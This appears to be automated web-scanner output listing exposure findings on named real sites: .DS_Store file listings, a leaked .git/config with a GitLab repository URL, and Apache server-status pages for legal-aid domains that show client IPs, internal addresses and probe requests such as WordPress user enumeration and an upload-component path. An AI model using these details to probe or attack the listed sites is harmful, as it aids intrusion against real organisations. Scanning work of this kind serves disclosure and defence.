.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
Severity: low
Fingerprint: 5f32cf5d6962f09cc169dbbec169dbbe92583714d59e5a2be1d602fe2d9669ff
Found 15 files trough .DS_Store spidering: /128879c7d504a1504f87bc45552c1b42.html /1fb48eb3a853faa3765a04259ec11fcf.html /about.html /contact.html /css /download-chrome-extension.html /faq.html /google0c5696219f74be2f.html /how-does-adblock-work.html /images /index.html /js /robots.txt /sitemap.xml /terms-of-use.html
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
Severity: low
Fingerprint: 5f32cf5d6962f09cdafa5447dafa5447fcdb0fea50390019d81f04271cef54b2
Found 18 files trough .DS_Store spidering: /_css /_img /asset_collection /asset_collection/backelor-party /asset_collection/conor-can-play-too /asset_collection/conors-basement /asset_collection/delores /asset_collection/jesses-basement /asset_collection/kill-that-bbq /asset_collection/leftovers-day /asset_collection/maura-plays-4-tobin /asset_collection/moab-bring-it-cat-stevens /asset_collection/Photos (11) /asset_collection/Photos (12) /asset_collection/stanley-session /asset_collection/tiny-porch-concerts /node_modules /plyr
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
Severity: low
Fingerprint: 5f32cf5d6962f09c0215adfc0215adfca91f45ec4da327ac377ea542b39cfa96
Found 4 files trough .DS_Store spidering: /Assets /favicon.ico /index.html /manifest.json
The following URL (usually /.git/config) is publicly accessible and is leaking source code and repository configuration.
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044bcbb9f9adb89503bfca4395bbf6b7921
[core] repositoryformatversion = 0 fileMode = false bare = false logallrefupdates = true [remote "origin"] url = https://gitlab.com/gsky/store-admin.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "master-pesanantar"] remote = origin merge = refs/heads/master-pesanantar
Severity: medium
Fingerprint: 2580fa947e78dd08e645819d3d07dc0e15a2bac0597ba8dac2335c8ec4442e96
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 4130 Connection: close Date: Sat, 06 May 2023 06:22:02 GMT Last-Modified: Wed, 25 Jan 2023 08:11:23 GMT Vary: Accept-Encoding ETag: "63d0e42b-1022" Accept-Ranges: bytes Server: gsky Request-Id: 51907a481f73cca848e1d035c328984d X-Cache: Miss from cloudfront Via: 1.1 dc0aad619823d3400ef947433d0af8fa.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: vaLc8XV00bUb3KO1o7sEZw-tYvPnfw60KhJTiyfLg7Z9uCHVqIZaEA== Page title: Belanja Online Yang Deket-deket Aja! | PesanAntar[core] repositoryformatversion = 0 fileMode = false bare = false logallrefupdates = true [remote "origin"] url = https://gitlab.com/gsky/store-admin.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "master-pesanantar"] remote = origin merge = refs/heads/master-pesanantar
Severity: medium
Fingerprint: 2580fa947e78dd08e645819d3d07dc0e15a2bac0597ba8dac2335c8e08a2a08b
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 4130 Connection: close Date: Sat, 06 May 2023 06:21:58 GMT Last-Modified: Wed, 25 Jan 2023 08:11:23 GMT Vary: Accept-Encoding ETag: "63d0e42b-1022" Accept-Ranges: bytes Server: gsky Request-Id: 9ca23e76a0fcfd84cd4588eaecaeeb8f X-Cache: Miss from cloudfront Via: 1.1 7251dede1ac94066b27bcd33919b30c6.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: CX2Cd4U7PTsjZuiGyto3QrjPmlPRpH0QpvoVxZ9zBkmGgED2iNZXZQ== Page title: Belanja Online Yang Deket-deket Aja! | PesanAntar[core] repositoryformatversion = 0 fileMode = false bare = false logallrefupdates = true [remote "origin"] url = https://gitlab.com/gsky/store-admin.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "master-pesanantar"] remote = origin merge = refs/heads/master-pesanantar
Severity: medium
Fingerprint: 2580fa947e78dd08e645819d3d07dc0e15a2bac0597ba8dac2335c8e696bb7ac
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 4130 Connection: close Date: Sat, 06 May 2023 06:21:58 GMT Last-Modified: Wed, 25 Jan 2023 08:11:23 GMT Vary: Accept-Encoding ETag: "63d0e42b-1022" Accept-Ranges: bytes Server: gsky Request-Id: 6151421e708e76290850e3a56640e353 X-Cache: Miss from cloudfront Via: 1.1 39e6266db143f6443f194d8c60e22480.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: uOR5Qwzs6gd9YvfppEwP8RVgGiEopBFcu6HpSBnMvSfg2Ifn5m7saQ== Page title: Belanja Online Yang Deket-deket Aja! | PesanAntar[core] repositoryformatversion = 0 fileMode = false bare = false logallrefupdates = true [remote "origin"] url = https://gitlab.com/gsky/store-admin.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "master-pesanantar"] remote = origin merge = refs/heads/master-pesanantar
Severity: medium
Fingerprint: 2580fa947e78dd08e645819d3d07dc0e15a2bac0597ba8dac2335c8eac4feb51
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 4130 Connection: close Date: Sat, 06 May 2023 06:21:58 GMT Last-Modified: Wed, 25 Jan 2023 08:11:23 GMT Vary: Accept-Encoding ETag: "63d0e42b-1022" Accept-Ranges: bytes Server: gsky Request-Id: 54d1c29ffd476b1c06b313dcb45207f8 X-Cache: Miss from cloudfront Via: 1.1 d63ea68c8b7458d49fe25f66ef7f0a5e.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: 67rGJQsKZSrHz3CiicaiaL19XifXemuTKfZFWhFMxPa6MLkisXwVEA== Page title: Belanja Online Yang Deket-deket Aja! | PesanAntar[core] repositoryformatversion = 0 fileMode = false bare = false logallrefupdates = true [remote "origin"] url = https://gitlab.com/gsky/store-admin.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "master-pesanantar"] remote = origin merge = refs/heads/master-pesanantar
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
Severity: low
Fingerprint: 5f32cf5d6962f09c1a5d9b0f1a5d9b0f64a1ebdf5e94e9cc48c6f08948c6f089
Found 3 files trough .DS_Store spidering: /company /industries /solutions
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
Severity: low
Fingerprint: 5f32cf5d6962f09c2eda814e2eda814ecb57fc5a0f5f09e473a9b73d88463efc
Found 6 files trough .DS_Store spidering: /landing_css /landing_js /landingcss /landingjs /landingwebp /startup
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
Severity: low
Fingerprint: 5f32cf5d6962f09c63442d9d63442d9d465af3ca465af3ca465af3ca465af3ca
Found 1 files trough .DS_Store spidering: /4.0.1681093543
Severity: low
Fingerprint: 5f32cf5d6962f09c63442d9d63442d9d99af7b8599af7b8599af7b8599af7b85
Found 1 files trough .DS_Store spidering: /4.0.1676253324
Severity: low
Fingerprint: 5f32cf5d6962f09c63442d9d63442d9db5ba4a24b5ba4a24b5ba4a24b5ba4a24
Found 1 files trough .DS_Store spidering: /4.0.1667797225
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
Severity: low
Fingerprint: 5f32cf5d6962f09c63442d9d63442d9d465af3ca465af3ca465af3ca465af3ca
Found 1 files trough .DS_Store spidering: /4.0.1681093543
Severity: low
Fingerprint: 5f32cf5d6962f09c63442d9d63442d9d99af7b8599af7b8599af7b8599af7b85
Found 1 files trough .DS_Store spidering: /4.0.1676253324
Severity: low
Fingerprint: 5f32cf5d6962f09c63442d9d63442d9db5ba4a24b5ba4a24b5ba4a24b5ba4a24
Found 1 files trough .DS_Store spidering: /4.0.1667797225
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b02188033b2d
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Tuesday, 11-Nov-2025 00:29:04 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 581 Parent Server MPM Generation: 580 Server uptime: 580 days 7 hours 34 minutes 30 seconds Server load: 0.00 0.00 0.00 Total accesses: 13758290 - Total Traffic: 195.7 GB CPU Usage: u430.13 s37.79 cu0 cs0 - .000933% CPU load .274 requests/sec - 4190 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers ____..____.W....._.............................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-580185470/157/812462_ 35.389064080.07.3313465.08 130.176.187.246http/1.1atlantalegalaid.org:8080GET /favicon.ico HTTP/1.1 1-580184080/90/789297_ 18.0594900.05.5313071.78 204.76.203.18http/1.1atlantalegalaid.org:8080GET /bin/ HTTP/1.1 2-580186830/167/757834_ 20.33156800.06.1412935.23 70.132.1.135http/1.1on.alas.org:8080GET /config.json HTTP/1.1 3-580183970/166/739862_ 18.88156800.05.5812403.23 70.132.1.135http/1.1on.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 4-580-0/0/720233. 3.954266400.00.0011880.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-580-0/0/699555. 0.714266500.00.0011559.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-580190050/115/660414_ 14.01160500.02.4110894.45 70.132.1.135http/1.1on.alas.org:8080GET / HTTP/1.1 7-580201350/122/635455_ 16.64156600.02.4610392.78 70.132.1.135http/1.1on.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 8-580201400/56/603365_ 8.39153000.02.379803.48 204.76.203.18http/1.1atlantalegalaid.org:8080GET /bins/ HTTP/1.1 9-580201450/105/583461_ 9.789061800.03.669214.39 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1762820030.206638097763061 10-579-0/0/514240. 0.008159700.00.008747.51 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-5801841325/136/478674W 19.950027.93.687899.97 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 12-579-0/0/414971. 0.008159600.00.006593.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-579-0/0/328774. 3.217487600.00.004788.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-579-0/0/289488. 3.12650422500.00.004306.74 70.132.4.80http/1.1atlantalegalaid.org:8080GET /info.php HTTP/1.1 15-579-0/0/265251. 5.797487700.00.003779.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-579-0/0/230468. 0.008159000.00.003442.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-580183980/109/167730_ 16.318300.03.652340.48 204.76.203.18http/1.1atlantalegalaid.org:8080GET /backup/ HTTP/1.1 18-579-0/0/145444. 0.008158400.00.002064.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-579-0/0/137616. 2.278159500.00.002104.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-579-0/0/128299. 3.427487900.00.001823.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-579-0/0/116746. 0.878159300.00.001693.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-579-0/0/121137. 0.008158700.00.001644.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-579-0/0/106118. 0.96650422630.00.001535.83 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api HTTP/1.1 24-579-0/0/108741. 0.008158600.00.001366.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-579-0/0/86001. 0.0010996600.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-579-0/0/68645. 0.0010996400.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-579-0/0/65061. 0.0010996200.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00235194400.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00235194200.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00235194300.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00235194100.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82880362300.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00887502100.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15877314200.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0687914416620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23879144100.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00887505600.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00887505400.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32879144110080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00887505500.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00887505300.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00887505200.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00887505100.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00887505000.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00887504900.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001346738800.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001346738700.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001346738600.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001346738500.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001346738400.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001346738300.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001346738200.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001346738100.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001346738000.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001346737900.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021901f75d5
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Monday, 10-Nov-2025 11:19:31 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 581 Parent Server MPM Generation: 580 Server uptime: 579 days 18 hours 24 minutes 58 seconds Server load: 0.00 0.00 0.00 Total accesses: 13757229 - Total Traffic: 195.6 GB CPU Usage: u292.2 s24.57 cu0 cs0 - .000632% CPU load .275 requests/sec - 4193 B/second - 14.9 kB/request 1 requests currently being processed, 8 idle workers __W____...._....._.............................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-580185470/47/812352_ 9.1052351650.02.6213460.38 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1762768328.592763900756835 1-580184080/10/789217_ 1.59194600.00.4613066.71 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-5801868324/58/757725W 6.520026.92.0612931.14 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 3-580183970/21/739717_ 3.8268771920.01.5112399.16 130.176.218.136http/1.1it.atlantalegalaid.org:8080GET / HTTP/1.1 4-580184030/87/720229_ 3.62685150.01.2311880.50 130.176.218.136http/1.1it.atlantalegalaid.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 5-580190000/4/699519_ 0.5768901920.00.2911559.12 130.176.218.136http/1.1it.atlantalegalaid.org:8080GET / HTTP/1.1 6-580190050/37/660336_ 0.134700.00.0710892.11 70.132.1.135http/1.1short.alas.org:8080GET / HTTP/1.1 7-579-0/0/635333. 0.002750700.00.0010390.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-579-0/0/603309. 0.003422600.00.009801.11 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-579-0/0/583356. 0.003422500.00.009210.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-579-0/0/514240. 0.003422400.00.008747.51 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-580184130/12/478550_ 1.9352053230.00.537896.82 15.158.40.136http/1.1atlantalegalaid.org:8080GET /components/com_creativecontactform/fileupload/?file=trg3hf 12-579-0/0/414971. 0.003422300.00.006593.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-579-0/0/328774. 3.212750300.00.004788.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-579-0/0/289488. 3.12176692500.00.004306.74 70.132.4.80http/1.1atlantalegalaid.org:8080GET /info.php HTTP/1.1 15-579-0/0/265251. 5.792750400.00.003779.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-579-0/0/230468. 0.003421700.00.003442.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-580183980/17/167638_ 3.9552354190.01.062337.89 15.158.40.136http/1.1atlantalegalaid.org:8080GET /components/com_creativecontactform/fileupload/index.php?fi 18-579-0/0/145444. 0.003421100.00.002064.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-579-0/0/137616. 2.273422200.00.002104.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-579-0/0/128299. 3.422750600.00.001823.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-579-0/0/116746. 0.873422000.00.001693.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-579-0/0/121137. 0.003421400.00.001644.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-579-0/0/106118. 0.96176692630.00.001535.83 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api HTTP/1.1 24-579-0/0/108741. 0.003421300.00.001366.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-579-0/0/86001. 0.006259300.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-579-0/0/68645. 0.006259100.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-579-0/0/65061. 0.006258900.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00230457200.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00230457000.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00230457100.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00230456900.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82875625100.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00882764800.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15872576900.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0687440696620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23874406900.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00882768400.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00882768200.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32874406910080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00882768300.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00882768100.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00882768000.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00882767900.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00882767800.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00882767700.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001342001500.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001342001400.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001342001300.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001342001200.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001342001100.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001342001000.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001342000900.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001342000800.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001342000700.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001342000600.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * H
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021096f91b9
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 08-Nov-2025 22:25:17 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 579 Parent Server MPM Generation: 578 Server uptime: 578 days 5 hours 30 minutes 44 seconds Server load: 0.00 0.00 0.00 Total accesses: 13755697 - Total Traffic: 195.6 GB CPU Usage: u411.23 s35.79 cu0 cs0 - .000895% CPU load .275 requests/sec - 4203 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers ___..W____..__.................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-57830630/132/812216_ 9.99279500.03.9013455.32 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 1-57830980/85/789119_ 8.99809900.02.7813063.06 70.132.4.80http/1.1atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 2-57830570/111/757548_ 22.9018982740.04.4712925.25 20.163.76.6http/1.1 3-578-0/0/739625. 0.441290600.00.0012395.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 4-578-0/0/720071. 8.851290500.00.0011876.48 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-578668925/62/699436W 11.770027.93.5811556.52 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 6-57831110/97/660203_ 20.23722000.06.3310889.94 70.132.4.80http/1.1atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 7-57831160/175/635235_ 27.18613830.07.9110387.81 130.176.137.70http/1.1elearning.alas.org:8080GET /lib/javascript.php/1564020885/lib/requirejs/require.min.js 8-57831210/134/603262_ 20.1554672580.04.519799.16 70.132.1.135http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 9-57830730/66/583279_ 12.69189700.03.399208.71 20.163.76.6http/1.1atlantalegalaid.org:8080MGLNDD_52.21.209.78_8080\n 10-578-0/0/514205. 12.691290700.00.008746.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-578-0/0/478504. 10.271290800.00.007894.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-57866940/7/414912_ 1.8654976160.00.556593.44 70.132.1.135http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 13-57866990/11/328738_ 2.1525122330.00.714787.49 15.158.40.136http/1.1elearning.alas.org:8080GET / HTTP/1.1 14-577-0/0/289451. 7.98576162570.00.004305.15 70.132.4.80http/1.1atlantalegalaid.org:8080POST /graphql/api HTTP/1.1 15-576-0/0/265212. 0.0019643300.00.003777.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-575-0/0/230461. 1.642304153240.00.003442.34 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 17-575-0/0/167581. 0.0027834200.00.002335.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-575-0/0/145436. 0.0027834000.00.002064.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-575-0/0/137595. 0.0027833900.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-574-0/0/128258. 0.0035231200.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-574-0/0/116729. 0.0035231000.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-574-0/0/121130. 0.0035230900.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-574-0/0/106104. 0.0035231100.00.001535.56 